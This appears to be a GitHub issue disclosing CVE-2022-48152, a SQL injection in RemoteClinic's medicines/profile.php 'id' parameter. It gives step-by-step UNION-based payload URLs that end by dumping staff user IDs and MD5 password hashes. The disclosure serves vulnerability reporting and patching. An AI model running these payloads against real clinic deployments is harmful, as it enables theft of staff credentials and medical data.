CVE-2022-48152: SQL Injection in /medicines/profile.php via `id` parameter · Issue #20 · remoteclinic/RemoteClinic

Vulnerability Description:

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application’s database server.

Vulnerable Endpoint: http://localhost/RemoteClinic/medicines/profile.php?id=30 (My Medicine Profile ID is 30)

Steps to Reproduce:

1. Login in Application as Doctor.

2. Click on Directory.

3. Click on any medicine profile.

4. Now PUT single quote in medicine profile endpoint.

5. Balance the Query to Remove Errors.

   Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=30%27–%20-

6. Find Total Numbers of Columns.

   Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=30%27%20order%20by%207–%20-

7. Find Vulnerable Columns.

   Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%201,2,3,4,5,6,7–%20-

8. Now Extract Current Database and Current User.

   Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20database(),user(),3,4,5,6,7–%20-

9. Extract All Users and Passwords (md5 hash).

   Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20group_concat(userid,0x3a,passkey,0x0a),2,3,4,5,6,7%20from%20p_staff_dir–%20-

Impact:

An attacker can use SQL injection to bypass a web application’s authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.